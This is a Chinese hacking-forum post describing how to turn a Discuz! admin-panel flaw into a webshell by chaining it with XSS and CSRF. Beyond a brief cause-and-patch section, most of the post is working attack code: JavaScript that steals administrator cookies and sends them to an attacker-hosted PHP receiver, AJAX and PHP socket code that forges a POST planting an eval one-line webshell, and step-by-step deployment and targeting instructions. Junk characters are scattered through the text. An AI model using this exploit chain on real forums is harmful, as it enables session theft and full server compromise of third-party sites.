Discuz XSS得webshell
& Z. b; J$ S* L, QBy racle @tian6.com1 s* q9 n& s9 Q, ^
欢迎转帖.但请保留版权信息.
' i' F% B6 T% v, [& q6 P! r2 U受影响版本 iscuz<=6.1.0,gbk+utf+big5: |* S' l6 H* E3 U
' C% W1 e/ L" V; F5 t0 Y; D/ T新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.
! J) _( _+ B9 }: z/ [
) N0 E0 A4 N# F9 M+ }, ~4 L+ t
& Z% |& i9 Z- S. _$ q2 g3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706
) x/ Y! A5 S) o$ R; d% v/ i$ V# p当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.& }* R2 _( O" Q, ~, U" C
% ^ i, O/ i g: i$ z) B% T& ^分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..
+ i9 @4 E% Z# _本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS
2 B6 `( @6 }5 ^( N0 z% e# h# Y! q0 ]! w1 g$ v! K2 M! p; s
. {- j+ s) h% X" d! i' A
----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------& V0 R6 H1 v( r) X5 b2 L
. n7 a) W* n3 |% J0 B3 R5 E, q8 c; N. y! [6 R% W, P- K! l
problem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.7 s. O/ ?- t% p- ]" y# ^+ ?- ]+ H) D
0 ], }4 E! d, P1 J/ Cproblem2 ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.% g* E* u U% X1 G3 O0 T4 _' f
2 j; t" ~/ k t5 Kproblem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.
" v7 {: w& Q* M3 g- T8 Q5 N; n8 y, c6 v7 n% U, p6 w
! h; P. z* \9 o1 X) a1 q
下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {
: h+ K& \8 s! F- W) Q; U7 h! a0 Z0 ~" w, a. I/ v2 F; K
global $runwizardfile, $runwizardhistory;. ^* P3 e$ N; \
, E% w# x! M& ]5 H0 W
$fp = fopen($runwizardfile, 'w');% F& c$ |) w/ Y9 c% y
+ }" D" O" _$ R0 E/ V fwrite($fp, serialize($runwizardhistory));+ c, [. f6 _+ N$ z0 g
2 o" _& l: C ~; I1 `$ r
fclose($fp);
, }+ q* J! i# G# q" X) V" A, M+ k. Z& }2 k2 z
}- t5 h7 f% ?' ~1 t5 E
复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.7 P* K5 z; S. o1 J9 {
以下是修补的办法:function saverunwizardhistory() {5 u7 U) R2 P& z
% S% h" O4 z8 @. }" j- R$ A9 _
global $runwizardfile, $runwizardhistory;3 L# I+ r8 r. k6 i( q! d6 V
$ T/ t+ M# I8 C* K/ F0 b $fp = fopen($runwizardfile, 'w');/ L% W" k6 g& K7 s2 [
7 Y' D* D0 X, R7 g' H $s = '<?php exit;?>';
1 {# w0 S/ J7 B7 P8 m; j# b
3 t% X! }9 ~5 t% K& a7 J' b* S1 u $s .= serialize($runwizardhistory);: G; W$ w7 w. m
: h% q5 E: P) C) P9 W
fwrite($fp, $s);
# R1 b* b7 V3 f& n: `& v4 U$ U" {1 J! B
fclose($fp);
! ~9 |" {2 \& z, g2 U/ f7 w" y; q1 |( n" E
}0 K2 J* e: W& B8 F2 [' e
复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.1 W! j3 x$ c: Q
1 a0 Z) _' d2 {6 H% X
6 C: |9 e" K/ k# F
, N; L6 y! D4 ?$ N8 w( G
----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------% b" T! n( s' W9 ]7 \0 Z- i0 l
& n' w* K; ]9 c9 \5 ?% G
, n0 B# n: `% J
以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.
1 a5 \% j, A( F O
. W2 K) x3 w; M* l; j: v' o0 _我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.0 A3 ?' h- f. R$ g# M4 {" V8 t3 r+ t
$ a+ a3 X- a# d这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.
}, P! f/ y! h# L) V8 S! k: @& O+ }0 J5 h0 F
首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:; H0 G/ z& ~6 k& A, x2 e# k
1 _' M; d* }! [6 m. Fvar url="http://目标网站/admincp.php";
: _8 `$ g' w) O" w( a7 V/ A5 _% a @* ~* U" u. L9 h
/*获得cookies*/
+ f# y" Z9 G8 N3 ~7 y& @- u% o) [, w' }% X) ~$ u4 I
function getURL(s) {
& } J$ X; K: c/ _2 n J% P4 `& w/ t6 B4 k, b S
var image = new Image();7 n6 ~% r. q' c7 d! j. K2 v& n/ o
' F$ V1 r# z+ w2 s: ?image.style.width = 0;
! W% O# B1 S7 T: a! k, m
/ k/ ^2 a6 K7 p# ~image.style.height = 0;" Q y5 Z* p! A8 @
, j' k N. B* jimage.src = s; H2 u1 ~" {0 W0 Y
6 R" R1 M" U" K: A} U F# I- R9 L' c4 `
3 T4 I% C# l. B: V) r( }% }
getURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie)); //这里就通过image变量传给了php4 I! x ~3 {( P4 h9 E9 ]
复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];1 Y( B; i0 L$ V4 u O$ @' C
复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵) ' w z% z$ U7 p) E/ D5 L3 l
, l' o+ ?% R6 D4 k, f) u
# H3 E0 y- n; a
获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";* l. W) w" q4 }- J2 I- R
3 S. _8 E4 E, r9 w
4 V2 F' Z+ r& J2 B
4 a" @; T" x( A- I2 A- A/*hash*/! k. u7 a4 K7 n, R4 v$ `
2 m+ ? X) t) I% D) y& pvar xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");2 A6 a: J# `( g8 j# G) U: g
6 l( w9 \" O4 g$ Y" M/ h
xmlHttpReq.open("GET", url+"admincp.php?action=home", false);( s& c2 d6 ~% g" E: b' P
6 [9 g6 _$ L% y! |# p V. |* I9 rxmlHttpReq.send();
" e/ U7 z* o9 X3 w) D- ?9 a0 ~% N9 x; a* b3 `
var resource = xmlHttpReq.responseText;
' \. P% y* O6 ` U2 ~' [6 t. L& @: D8 Q# i3 W5 \8 ]; H2 I" U, q
var numero = resource.search(/formhash/);# Y0 a' k. M+ A7 _/ y
0 S4 O$ q3 x, r) H- ~2 C1 X0 N4 g) rvar formhash=encodeURIComponent(resource.substr(numero+17,8));
+ [: H8 x i4 H, B
8 Y1 T. W2 O; ^' P% X+ b1 R' {- V
1 E/ a5 ?# ?/ `' r. @# m. K: I. B- V& y
var post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据
* F9 r1 |) ^+ P- x- k% U
t/ T& @; n/ W& R8 x1 ?4 l8 \! oxmlHttpReq.open(" OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信
( f. h# _# |& w" t' a
7 M& s3 d5 X% m% c4 r9 l: o QxmlHttpReq.setRequestHeader("Referer", url); L& ?. u- e- n+ p
6 u5 |- z% N8 Q+ \1 { }% E1 @xmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");1 x5 L; `" D' w
; l* k6 x: v. `4 G: u3 [ f
xmlHttpReq.setrequestheader("content-length",post.length);
+ C# y1 S( E k7 e5 W! k/ P) h/ P E0 {- x" B( Z
xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded"); " j6 p0 ~- }- a+ T6 E5 ^ U! _# h
' Q$ u7 k2 F/ E% M: SxmlHttpReq.send(post);//发送数据
8 Q# e+ h4 b5 o' v" W复制代码这里HASH我假设正确,这样提交,也无须cookies V$ i3 V( W7 Z' a5 S
) N, J/ l& V. c9 p' @# x7 v8 ]
再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);
0 B) X/ B# L, a/ V% i
$ b& @) e. \- t- v+ Q* mif (!$sock) die("$errstr ($errno)\n");5 L- \5 A* o- l0 {3 ?8 e
) Y, s/ K: @5 R$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';# e) v) V. a4 z- Y+ l7 B
- s5 [. J) e, m6 [/ j! v" r! |
f+ }( b/ ?3 w& Q+ G
3 }5 n. f3 R. D7 N) ]$ p5 {; Lfwrite($sock, " OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");, e9 W2 R" l+ X8 c
' R' F6 ]* P4 n( J6 h3 O" q, a
fwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");
1 H, r% ?5 i! }1 ], w$ I4 P% r+ k7 b, @7 Z8 Y9 S
fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");
0 |9 m3 a% A9 F' ^9 v3 T4 C/ l3 \1 q8 P& p; P2 p& f- D
fwrite($sock, "Accept-Language: zh-cn\r\n");
" M) I7 M. Y( V8 S# B: d0 i( }5 c4 K; l' D, Y7 H
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");8 u" g# Q: P) W/ {
2 f+ v; f0 g' |( J9 K' G7 pfwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
& z$ w6 }+ f' t( r8 u3 _
0 w+ Z7 m) _& G7 P' H. _fwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");
; ?, `+ J+ I. b" O/ m- r* F7 L% h3 }! R+ L2 M6 `: ~8 s! e( t
fwrite($sock, "Host: $url\r\n");
& s0 k$ P* v3 h: d
5 S p$ j9 h$ b- q& S9 d* Bfwrite($sock, "Content-Length: ".strlen($data)."\r\n");2 O9 U) f2 H( O& k: A6 G+ c5 a: k
! Z& Q3 R1 L( Y1 p: u% u0 r' cfwrite($sock, "Connection: Keep-Alive\r\n");
+ e& ~6 y7 r% U- f( P! ]% P+ t$ ]8 f @6 \+ |7 W
fwrite($sock, "Cache-Control: no-cache\r\n");' _# R+ j) s: B" O8 L& P7 v' k" k
0 _' P5 P" p5 t# t& z3 A: Bfwrite($sock, "Cookie:".$cookies."\r\n\r\n");( ]$ v1 a# E) u; ]: |
! [) G0 C" x# j0 |, d! J
fwrite($sock, $data);
% e0 d, u2 P( R ~0 f+ C+ F: y2 a. f+ F6 q. k# w/ `9 X" [+ }( i# m
4 L' X* ]" b) c* z. l/ |7 L1 M' O g, R1 f
$headers = "";7 E7 C6 y" X9 L, i( j |
+ h0 W5 K6 v5 A8 Z
while ($str = trim(fgets($sock, 4096))); v8 d- |1 E$ ^, V
" Q1 _+ ~, Y( x9 r; _9 P $headers .= "$str\n";
+ n$ ~8 g, N7 ]) l) e5 m
( u$ K- G4 u7 n, Qecho "\n";
% v0 `) y6 P" }, u: W" ^# m+ N% V
$body = "";
R4 Y/ Y" `' B8 _9 r4 m: d5 ~7 s6 l$ U, J$ q7 n* ?5 H O
while (!feof($sock))
2 c ~4 o z7 q0 b% o. Y# ^7 X0 I8 `6 ^# w8 q
$body .= fgets($sock, 4096);5 d: _8 J% M* z- Y- P, x
- R& T2 `9 a8 w9 L, I; A! Bfclose($sock);
. a% G8 h* p! G! ?. B1 g- g' g C
2 T0 ?7 }, ~9 W5 T7 Eecho $body;% w2 R+ p4 k* I6 C/ r
复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^8 I+ m; T- D" W2 U
7 v8 o# W4 w9 [$ v+ l* o1 ^9 T# V, `8 F' @0 @1 ]* O3 [1 y9 L
-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------
B: a- s* u9 z$ ~( U# \( M
* h( Y: Q9 u5 Y
; h$ X3 P* n; \4 o4 z1 HP SOCKET利用方法首先打开racle.js
& M$ X9 T$ i# C- F/ r
" s) P: J$ p: `( e u3 Uvar url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home9 V$ n& }) S ~9 U( b/ l5 }
/ B4 o2 d1 W& G; S/ N+ v3 q
6 m& B% O3 z! `+ f. i
2 F! i/ a, T8 K ?3 {
然后打开racle@tian6.php4 ?! R! v$ q; U+ ^* F. e a
) v+ T3 y9 L1 v$ \! _5 L% @
$url="racle@tian6.com"; //改成你要XSS攻击的目标,譬如www.discuz.com! [% q+ I1 m4 Z% ^3 [0 A+ B5 v/ M
. \0 A" I0 I/ ?% H; Y3 O
3 z( A# Z' q6 `* {. ~
4 {4 v! L# _0 k2 @- i& m如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
3 ]! ?4 V4 ^4 E3 G; P- `, o* ]
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));
; u4 l" F1 w% B8 G: R9 U; R4 @. n; Z! h% S2 M
为' Z+ t" t' G" r4 _* v2 ~
7 S$ Q: i1 t+ m2 _( M4 F+ C. i
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));9 I1 f; X- u' c1 \0 Y9 ~/ w
复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.
@% ]' W) o, P, W4 k: F( Q8 _, f }5 K0 B) S$ ^& U! N' H1 `- A; F
; Z' Q1 A5 H( U& z/ V$ T+ c
' u# z0 F$ B5 H) U4 F# M% p如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
3 Q- E! n$ c2 z
2 d O' D! s$ U: r$ evar formhash=encodeURIComponent(resource.substr(numero+17,8));( d l6 C; M5 q* B
7 M: J3 I5 Q/ G% D: L2 `
为4 R4 F$ Q, s+ O" d
4 F3 G+ T; f" \/ p' H; I8 Yvar formhash=encodeURIComponent(resource.substr(numero+9,8));" y' H0 F1 j& q, T- C3 w
复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.. Z' V' I: O) Z5 C3 _$ ]
' J1 b, d! ?( z! B, h4 }如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.
1 l, V4 ]( o" F
* K) v: j, j0 M9 s* I如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.
% U6 }' V- }7 {3 x
- l$ _, ~, _) T6 _3 v& ^& v& y不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.
$ ^3 ^0 U9 z: v$ J h% g
7 Q3 R9 v& o$ v |